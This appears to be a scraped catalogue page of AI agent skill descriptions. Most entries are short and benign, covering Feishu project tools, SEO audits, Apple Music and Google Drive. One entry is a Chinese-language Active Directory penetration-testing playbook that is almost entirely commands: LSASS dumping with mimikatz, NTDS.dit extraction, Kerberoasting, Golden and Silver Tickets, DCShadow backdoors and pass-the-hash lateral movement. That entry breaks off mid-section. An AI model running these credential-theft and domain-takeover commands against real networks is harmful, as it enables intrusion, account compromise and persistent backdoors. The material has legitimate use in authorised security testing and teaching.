全部能力

飞书项目（Meego/Meegle）操作工具。支持查询和管理工作项、节点流转、视图查询、个人待办、排期统计等功能。 Use when user needs to work with Feishu/Lark Meego project management — including querying work items, creating/updating work items, completing workflow nodes, checking views, listing todos, analyzing schedules/workloads, or searching with MQL. 关键词：飞书项目、meego、meegle、工作项、需求、任务、缺陷、排期、视图、待办、节点。

Integrate Apple Music playback, catalog search, and Now Playing metadata using MusicKit and MediaPlayer. Use when adding music search, Apple Music subscription…

Verifies that git commits address security audit findings without introducing bugs. This skill should be used when the user asks to "verify these commits fix the audit findings", "check if TOB-XXX was addressed", "review the fix branch", "validate remediation commits", "did these changes address the security report", "post-audit remediation review", "compare fix commits to audit report", or when reviewing commits against security audit reports.

Optimize for search engine visibility and ranking. Use when asked to "improve SEO", "optimize for search", "fix meta tags", "add structured data", "sitemap…

Fast codebase search via WarpGrep (20x faster than grep)

Performs comprehensive C/C++ security review for memory corruption, integer overflows, race conditions, and platform-specific vulnerabilities. Use when…

Prepare meeting materials with Notion context and Codex research; use when gathering context, drafting agendas/pre-reads, and tailoring materials to attendees.

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务，需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限，注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Structured OSINT investigations — people lookup, company intel, investment due diligence, entity/threat intel, domain recon, organization research using public…

Semantic search across notes in Get笔记 via the getnote CLI

飞书视频会议与妙记操作。多维搜索历史会议、获取会议纪要/AI 产物/逐字稿、 查询会议录制、下载妙记媒体文件。支持 meeting-ids / minute-tokens / calendar-event-ids 三路径入口。当用户请求"搜索会议"、"会议记录"、"会议纪要"、"逐字稿"、"妙记"、"meeting"、 "vc search"、"vc recording"、"minutes"、"下载妙记"、"妙记视频"、"会议录制"、 "从日程找会议"时使用。

Search the FPF knowledge base and display hypothesis details with assurance information

GEO-first SEO analysis tool. Optimizes websites for AI-powered search engines (ChatGPT, Claude, Perplexity, Gemini, Google AI Overviews) while maintaining traditional SEO foundations. Performs full GEO audits, citability scoring, AI crawler analysis, llms.txt generation, brand mention scanning, platform-specific optimization, schema markup, technical SEO, content quality (E-E-A-T), and client-ready GEO report generation. Use when user says "geo", "seo", "audit", "AI search", "AI visibility", "optimize", "citability", "llms.txt", "schema", "brand mentions", "GEO report", or any URL for analysis.

Guides developers and admins through direct interaction with the Fusion Help REST API — reading articles, FAQs, release notes, searching content, and managing…

Schema.org structured data audit and generation optimized for AI discoverability — detect, validate, and generate JSON-LD markup

Technical SEO audit with GEO-specific checks — crawlability, indexability, security, performance, SSR, and AI crawler access

Google Drive, Gmail, Calendar, and Docs operations via OAuth. Use this skill when uploading files to Drive, searching Drive folders, searching Gmail, finding…

Generate a professional, client-facing GEO report combining all audit results into a single deliverable with scores, findings, and prioritized actions

Expert SEO content strategy for SaaS and B2B sites. Use when doing keyword research, planning content clusters, creating pillar pages, optimizing on-page SEO,…

Platform-specific AI search optimization — audit and optimize for Google AI Overviews, ChatGPT, Perplexity, Gemini, and Bing Copilot individually